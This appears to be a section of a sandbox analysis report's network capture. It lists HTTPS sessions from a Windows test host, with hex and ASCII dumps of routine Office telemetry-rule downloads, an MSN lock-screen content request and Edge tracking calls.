09 6a 16 d2 a2 6a a9 6f 2c df 71 2e 11 e1 ff 00 d0 fe Data Ascii: 4SgQ"8g)]Z-sHr-:;gdV<C*'EZsn`oneOi,-2$lJ(g}YG>\\_R-!'_{~CRdJ=?7#Z?ub\|&y7"YoOjjo,q.
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: e4 bb 87 c9 6f ef a3 ef 4a 50 c4 42 43 1f 25 b7 f7 d2 8f b3 7f 9c d4 b6 ba 85 85 cc 2b b1 f6 4a ff 00 7e 17 74 de 94 eb 89 5d 7e 44 f9 2b 5e 70 e6 20 8e da 8f 23 75 32 46 9a 5f f6 ff 00 e0 74 47 1b b7 fb 55 66 7c c1 f6 6a 3e cd 53 46 b3 7f b7 56 a3 6f e0 74 a9 34 e7 29 47 03 ad 4f 07 9c bf 72 ad 48 d6 cb 0f 9d 70 e9 0c 5f df 7a c1 d6 3c 63 a5 59 bf 93 69 fe 91 2e fd 9b df e4 4f fe 2e b9 ab e2 f0 f4 be 29 15 03 7a 38 d1 be fa 6d ff 00 72 aa ea 9a 86 95 a5 42 d3 4b 78 93 6c fe 08 5d 1d eb 81 d5 75 cd 63 53 dc 97 17 9e 4a ef f9 21 47 d9 ff 00 8e 56 5e ef bc f6 8f f3 7f b9 fc 15 e3 e2 33 69 ff 00 cb a8 9a 6a 77 53 f8 cd 36 7e eb 4a ff 00 63 e7 7d ff 00 3a 7f b9 55 e0 f1 7d fc ae db 2c 2d 11 53 f8 de b8 89 16 66 ff 00 5b f7 b7 ef fb f4 f8 e5 f2 93 63 fc 8b f7 Data Ascii: oJPBC%+J~t]~D+^p #u2F_tGUf\|j>SFVot4)GOrHp_z<cYi.O.)z8mrBKxl]ucSJ!GV^3ijwS6~Jc}:U},-Sf[c
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: bf c0 ef f3 bf c9 53 cf 30 2a cf a5 59 de 43 b1 36 44 af b3 7c 3b ff 00 73 f2 3d 53 d4 ad 93 4a b9 67 b7 b3 77 96 e7 f7 50 cd f7 fe 7a d6 b4 b6 85 d1 91 ec ed d3 fd 8d 9f df 7f fd 0e 9f e5 3a c3 f6 6f bf 2f df f9 f7 ec ae 88 62 02 67 39 a6 dc d9 d8 dc b4 da 9d e5 c5 a5 fe f4 b7 77 4d ef 0b ba 7c ee 89 bf e4 ae b6 4d 43 ec cf 71 0e cd 8c 89 e6 a2 23 fd f4 ac b9 34 ad d7 3f 69 b5 77 9b c9 4f 29 2d ee 3e e2 3f f7 f7 fd fd f4 db a8 a1 8a fe d6 c2 58 6f a6 64 77 96 da 6f 9f 62 6c 4f ef d5 cf d9 55 33 89 72 38 ac 35 5d 4a e1 22 85 ed 2f 3e cc 97 68 8f b1 d3 fe f8 fe 0a e7 a4 b6 b9 8a 65 7b 77 49 af df 7f cf f3 a6 cd 9f df 7a de ba b3 b0 d3 2f db 5b 89 2e 3c d7 df bd 21 4f 39 e6 ff 00 63 7d 6d 40 b6 17 3a 6e cf 26 dd ed 66 f9 f6 3f dc ac be b1 ec bf c2 12 81 c7 Data Ascii: S0*YC6D\|;s=SJgwPz:o/bg9wM\|MCq#4?iwO)->?XodwoblOU3r85]J"/>he{wIz/[.<!O9c}m@:n&f?
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 72 e8 9f 3f dc de e9 54 34 7b 69 96 e6 ea 64 4d df e9 30 a2 6c f9 3e 7d 9f 3f fc 02 b6 75 8b c9 ad ad be cd f6 04 86 e1 11 36 6c f9 df ce 7f e0 df 5e 65 69 ca 15 7d d3 d9 a3 0f dd 7b c5 0d 73 fb 2a fb 41 69 9e 6b 48 76 6f f2 51 26 fb 89 ff 00 a0 57 8a 47 a6 23 6a 5f 69 96 6b 87 95 f7 ba 7f 73 e7 fb 88 95 eb de 3c 8e 15 d3 6d d1 f6 7d 8e 68 52 24 f2 6b 86 d4 a3 b0 82 fe d6 db ce fd d7 c8 f3 6c fe e6 fa ee cb e7 09 52 38 71 b4 bd fe 53 47 c2 36 2f a1 e8 37 f7 32 ef 79 61 85 2d d1 fe e6 c7 7a ea 3c 33 6c 9a 7e 95 3e 9a f6 17 08 d6 db 13 ed 6e fb f6 27 f7 3f f6 7a 34 ab 39 a5 d2 a5 79 51 1e df ed 8f 14 2f f3 a4 3f 27 fb 7f c7 fd c4 ab 1a 53 3a e9 57 e9 be e1 b5 49 91 ee dd 36 6f 4f bf fc 7f f0 0a e7 95 69 7b c7 4c 21 08 c2 25 3b 75 f3 66 67 95 d1 19 3e 47 a6 Data Ascii: r?T4{idM0l>}?u6l^ei}{s*AikHvoQ&WG#j_iks<m}hR$klR8qSG6/72ya-z<3l~>n'?z49yQ/?'S:WI6oOi{L!%;ufg>G
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 74 3b 25 4f e0 fb 95 5f 4a be b9 54 b8 48 9e df f7 3f 7d 3f 82 ba 68 16 da f2 e6 df 62 5c 3a dc c2 9b ff 00 d8 de 95 12 90 61 fe 03 92 d7 2c 66 d3 35 28 a6 8a f3 ed d6 7a 95 b7 da 21 99 3e 4d ee ff 00 7d 29 9e 1f b6 78 1d 9f c9 de c8 8e e8 ef f7 12 b6 b5 8f 17 cd 2c 32 e9 52 e9 56 93 4b 61 b2 de 1b 84 de 8e e8 9f 73 e4 fb 95 9b f6 c8 67 b9 b7 d8 9b 15 26 d8 e9 fc 1b 1d fe e5 6b 09 4f 93 de 89 c5 f0 cc bf 1f 93 73 61 6f 7e 89 fe a6 64 47 f2 53 ef d3 f5 85 b6 96 15 48 93 64 5e 73 c4 e9 fe e5 32 e9 5e c7 cd 48 93 f7 48 ee 9f 26 fd e9 b1 e9 f1 d9 f9 f6 32 f9 bf 3a a5 cb be cf e3 de f5 26 f2 8f b8 5e f1 e5 9d ce b5 61 6b ac 45 66 ef 6e 96 c8 8f 77 fd f7 4f 93 fc ff 00 c0 28 f0 8f 87 b5 5d 4f 4d 96 e7 7a 5a 7d a7 e7 85 f6 6c 4f 92 b5 fe 1e ea 16 16 c8 d6 1a 84 Data Ascii: t;%O_JTH?}?hb\:a,f5(z!>M})x,2RVKasg&kOsao~dGSHd^s2^HH&2:&^akEfnwO(]OMzZ}lO
2024-11-25 23:25:50 UTC	16067	IN	Data Raw: 3b 3b 79 53 7f dc ae 73 55 fb 1e b5 e3 3b 5b 99 7e d0 8b a9 43 e6 fd cd 8e fb d1 d2 b7 a5 2f b4 73 d5 87 d9 3d 1b 55 78 75 3b 18 92 e3 ee ba 27 f0 3f df d9 59 bb 6c ef 9e e9 1f f8 13 ec fe 72 7f b9 ff 00 a0 55 6b ab e7 82 c2 df ed 10 f9 db df ee 27 df 77 74 7f fd 92 b6 ef ac 6c ed a1 57 b7 85 e1 59 a1 44 f2 66 77 4f 25 df e7 d9 5c b1 f7 7d d3 ae 5c f2 f7 8c 4f 07 4b 67 17 8a ad 51 de e3 ec ef bd 37 bf f7 f6 55 e9 20 87 5e b9 6b 09 51 2d d9 2d 9e 5d 9b 36 23 ec 7a c4 d0 d6 fe 0f 16 69 af 69 b5 ed ed a6 d9 32 7f 1f ce 95 15 d5 f3 b7 c6 fb 7b 0f 39 fc ab 9d 91 7c 9f 3e f4 74 a2 51 e6 9c bf c2 44 65 cb 08 ff 00 88 b9 e0 e9 f7 47 aa 5b 6f 44 54 b6 fb 5b be cf bf bd f6 7f ec 95 a1 06 91 f3 ca 91 5c db db b2 22 7c ef fc 6f b2 b2 34 3b 14 fe d8 96 da 1d f6 f1 5c Data Ascii: ;;ySsU;[~C/s=Uxu;'?YlrUk'wtlWYDfwO%\}\OKgQ7U ^kQ--]6#zii2{9\|>tQDeG[oDT[\"\|o4;\
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: f5 d6 f8 3b c2 f7 36 36 d6 0f 77 aa dc 43 2d b2 3f 9d 0b a3 ff 00 1f fe 87 51 ec bd f0 fa c4 e5 ee 9b 3e 19 b9 d1 3c 55 af 5a db 5b d9 ea d6 37 09 36 c7 9a 64 49 be fa 7d f7 ae ab 58 f8 61 aa d8 d9 cb 7f 16 a5 63 77 6b b3 63 ef 7d 8f bd de b8 d9 34 ff 00 36 e7 67 f6 ab c3 6f b1 ee 37 f9 29 f2 6c ff 00 c7 ff 00 b9 52 cf 7c fa 7d fc be 57 89 ee 3e d1 f6 6d 88 96 fb d3 e4 7f fc 71 eb 29 c3 96 7e e8 7d 62 7c 9c b2 39 ab bd 22 fe 2b 6b 84 8a fe de ed ac dd 22 b9 85 37 bc c8 9b fe fb fc 9f ec 56 7e 95 05 9d f7 cf 2a 5b a2 bb bf c9 bd d1 36 23 ff 00 df 75 d0 cf ad 7f 68 bc 50 dd f8 93 7f da 6e 52 dd ee 1e 17 79 a1 99 3f bf b3 f8 2b 90 81 66 8b 55 f2 65 fb df 3f dc 4f 93 ef d7 6d 19 cf ed 1c f2 8f 34 0a 5a ae 95 fd 9e 97 09 12 5b ed fb 62 36 c7 f9 df 63 d4 b6 b3 Data Ascii: ;66wC-?Q><UZ[76dI}Xacwkc}46go7)lR\|}W>mq)~}b\|9"+k"7V~*[6#uhPnRy?+fUe?Om4Z[b6c
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: 19 4c eb 7f 65 b6 78 3e 2a 6b 93 3d cb 5c 59 ec f3 5e 14 4f 91 df ce f9 3e fd 3e d7 43 d4 b5 5d 36 f2 19 61 b7 b7 b0 4d 62 e3 7b bb be f4 7d e9 5c 87 ec ea d7 8d 79 e2 0b e8 af 25 b7 b8 87 4d fd cf cf f2 fc ef f7 ea dc 11 6a ab 61 75 73 77 33 bd c4 d7 32 be cf 9f 67 c9 f7 de b9 a5 1f de ca 47 74 6b 72 d2 8c 4e 9b c4 7a 0f 87 ad ae 75 2d 55 fe d1 6f 67 0a 3c 50 f9 3f 3a 79 db fe 47 df fe e5 5a d3 74 8b 3b ed 12 2b 6b 4d 4b ed 0d b3 7b bb ec 44 d9 bf f8 3f db ae 0e fb 50 b9 9f 47 b8 b3 47 df 6b 0e f7 4b 77 f9 d1 26 44 de ff 00 ed ff 00 1b d6 97 86 6e 6e 74 f8 76 3a 27 fa 67 c8 f0 be cd e8 88 9f 27 c9 ff 00 03 ab e5 9f 21 cf cf f6 8e e7 c4 7a 85 cd b7 83 ff 00 e1 1b bb fb 3d a2 dc d9 ec b6 f9 d3 7f 93 ff 00 ed a5 63 6b 13 df b5 b6 9a ef 33 3d c5 9a 6c 47 fb Data Ascii: Lex>*k=\Y^O>>C]6aMb{}\y%Mjausw32gGtkrNzu-Uog<P?:yGZt;+kMK{D?PGGkKw&Dnntv:'g'!z=ck3=lG

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:49 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232549Z-174f7845968j6t2phC1EWRcfe80000000us00000000004vu x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:49 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	49887	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	2638	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232546Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=755262e59a394e14894dac9a9c058398&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338387&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=531098720,531174684,532365230&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:49 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 21514 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: pnBWxwMVkLC9gR3aoA0qsm33fXkXrIq3SUCLT02iJGNrCg5lZbA/C7JdfKFO4pFpeJz2wzxgo9rH6+pCDppctT8esXbVQVKPMJNSobINtUSSDo4CuyUzsXXExnRVjzsVgca44cJuflOkIfOYnMv9UohLFUrraMzaCj1hQnNnBPr94FIA78bVbI95gJHaLcWeHap5Zv2Bytc9w8L/uRNZxUDGxVQ0TtQnWZaeNMNl3BpG74XPVD54dxndNfYYFSfi9ANVIB75NInaPzt3AeQve1ls7cpsPuUxQzupIeqSY+2AlhMnOksseq281onPGTOc9Uq8k6Dfg4bFK4b5k+3t6g== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-11-25 23:25:50 UTC	5945	IN	Data Raw: 70 65 58 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 6c 61 6e 64 73 63 61 70 65 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 58 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 63 6f 70 79 72 69 67 68 74 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 Data Ascii: peX\":{\"isOptional\":true,\"type\":\"numeric\"},\"landscapeY\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitX\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitY\":{\"isOptional\":true,\"type\":\"numeric\"},\"copyright\":{\"isOptional\":true

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:49 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232549Z-174f784596886s2bhC1EWR743w0000000uk00000000005bv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:49 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:49 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232549Z-174f7845968j6t2phC1EWRcfe80000000up000000000050p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:49 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	49892	18.173.132.23	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	925	OUT	GET /b?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Mon, 25 Nov 2024 23:25:49 GMT Location: /b2?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1E763f68b32d41d689280de1732577149; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1E763f68b32d41d689280de1732577149; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 e8977de5589675c37360cfbb1bfac24a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P2 X-Amz-Cf-Id: dABiz3Z8iNvTqf5P0odC6U_sDeTSemjZ5qYAIjm-BY8XrpgJSrUQVw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	49891	20.110.205.119	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
